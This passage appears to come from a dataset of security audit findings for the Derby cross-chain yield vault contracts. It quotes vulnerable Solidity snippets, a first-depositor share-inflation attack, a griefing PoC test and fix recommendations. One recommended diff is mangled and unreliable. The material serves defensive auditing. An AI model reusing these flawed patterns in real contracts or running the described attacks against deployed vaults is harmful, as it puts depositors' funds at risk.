in next periodчmediumчGame doesn't accrue rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. Because of that the user does not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called.
And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle 6.new allocations is saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skip 1 rebalance period(he doesn't allocate on that period).\\nAs you can see this is very serious bug. Because of that, player that wants to adjust his allocation every rebalance period will loose all his rewards.чFirst of all, you need to allows to call `rebalanceBasket` only once per rebalance period, before new rebalancing period started and allocations are sent to xController. 
Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for same period.чPlayer looses all his rewardsч```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n -Vault.blacklistProtocol can revert in emergencyчmediumчVault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. 
This can create problems as in case of hack, attacker can steal funds, pause protocol and any other things that can make `withdrawFromProtocol` function to revert. Because of that it will be not possible to add protocol to blacklist and as result system will stop working correctly.чProvide `needToWithdraw` param to the `blacklistProtocol` function. In case if it's safe to withdraw, then withdraw, otherwise, just set protocol as blacklisted. Also you can call function with `true` param again, once it's safe to withdraw. Example of hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist(\"vault\", false) which blacklists vault 3.in next tx you call setProtocolBlacklist(\"vault\", true) and tries to withdrawчHacked or paused protocol can't be set to blacklist.ч```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n -The protocol could not handle multiple vaults correctlyчmediumчThe protocol needs to handle multiple vaults correctly. 
If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), \"No rebalance needed\");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`чKeep tracking the `lastTimeStamp` for every `_vaultNumber` by using an arrayчThe protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right valuesч```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n -User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol priceчmediumчUser should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. 
This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exchange rate of protocol. It can be 0, or it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both these cases are bad.\\nSo I believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real.
3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.чIn case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.чUser's rewards calculation is unpredictable.ч```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n -Malicious users could set allocations to a blacklist Protocol and break the rebalancing logicчmediumч`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. 
If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), \"Protocol on blacklist\");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()чIssue Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic\\nYou should check if the Protocol on the blacklist when Game players `rebalanceBasket()`чThe guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.ч```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n -inflate initial share price by initial depositorчmediumчinitial deposit can be front-runned by non-whitelist address to inflate share price evading the `training` block, then all users after the first (the attacker) will receive no shares in return for their deposit.\\n`training` block inside `deposit` function intended to be set as true right after deployment. 
This `training` variable is to make sure the early depositor address is in the whitelist, thus negating any malicious behaviour (especially the first initial depositor)\\n```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n```\\n\\nFirst initial depositor issue is pretty well-known issue in vault share-based token minting for initial deposit which is susceptible to manipulation. This issue arise when the initial vault balance is 0, and initial depositor (attacker) can manipulate this share accounting by donating small amount, thus inflate the share price of his deposit. There are a lot of findings about this initial depositor share issue.\\nEven though the `training` block is (probably) written to mitigate this initial deposit, but since the execution of setting the `training` to be true is not in one transaction, then it's possible to be front-runned by attacker. 
Then this is again, will make the initial deposit susceptible to attack.\\nThe attack vector and impact is the same as TOB-YEARN-003, where users may not receive shares in exchange for their deposits if the total asset amount has been manipulated through a large “donation”.\\nThe initial exchangeRate is a fixed value set on constructor which is not related to totalSupply, but later it will use this totalSupply\\n```\\nFile: MainVault.sol\\n exchangeRate = _uScale;\\n// rest of code\\n function setXChainAllocationInt(\\n uint256 _amountToSend,\\n uint256 _exchangeRate,\\n bool _receivingFunds\\n ) internal {\\n amountToSendXChain = _amountToSend;\\n exchangeRate = _exchangeRate;\\n\\n if (_amountToSend == 0 && !_receivingFunds) settleReservedFunds();\\n else if (_amountToSend == 0 && _receivingFunds) state = State.WaitingForFunds;\\n else state = State.SendingFundsXChain;\\n }\\n\\nFile: XChainController.sol\\n uint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n uint256 totalSupply = getTotalSupply(_vaultNumber);\\n\\n uint256 decimals = xProvider.getDecimals(vault);\\n uint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\nчThe simplest way around for this is just set the initial `training` to be `true` either in the variable definition or set it in constructor, so the initial depositor will be from the whitelist.\\nor, more common solution for this issue is, require a minimum size for the first deposit and burn a portion of the initial shares (or transfer it to a secure address)чinitial depositor can inflate share price, other user (next depositor) can lost their assetч```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + 
balanceSender <= maxTrainingDeposit);\\n }\\n```\\n -Wrong calculation of `balanceBefore` and `balanceAfter` in deposit methodчmediumчThe deposit method calculates the net amount transferred from the user. It also takes `reservedFunds` into consideration when calculating `balanceBefore` and `balanceAfter`, but that is not actually required.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`чIssue Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method\\nUse the code below. This is the correct way of finding the net amount transferred by the depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\nчDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`ч```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n -Vault could `rebalance()` before funds arrive from xChainControllerчmediumчInvoke sendFundsToVault() to push funds from xChainController to vaults.
which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor \"fast path\" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.чCheck if funds are arrived or notчThe vault 
could `rebalance()` before funds arrive from xChainController, which will reduce rewardsч```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n -`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad stateчmediumчA user can grief the send funds to vault state transition by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is triggered per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to, `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed.
So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\nчI recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line 
below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\nчXChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.ч```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n -Protocol is will not work on most of the supported blockchains due to hardcoded WETH contract address.чmediumчThe WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. 
While the project has integration tests with an ethereum mainnet RPC, they don't catch that on different chains like for example Polygon saveral functionallities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\nчThe WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.чProtocol will not work on most of the supported blockchains.ч```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n -Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaultsчmediumчRebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. 
The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. 
At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\nчIn `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.чDue to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enable in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a block rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. 
If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.ч```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n -Wrong type casting leads to unsigned integer underflow exception when current price is < last priceчmediumчWhen the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.чCasting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\nчThe rebalance will fail when the current token price is less than the last one stored.ч```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n -withdrawal request overrideчmediumчIt is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod 
== 0, \"Already a request\");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.чRequire `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.чWhile not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.ч```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, \"Already a request\");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n -Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.чhighчCertain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). 
This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 
30 = 0.3%)\\n bytes(\"\") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.чProvide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.чAn attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.ч```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // 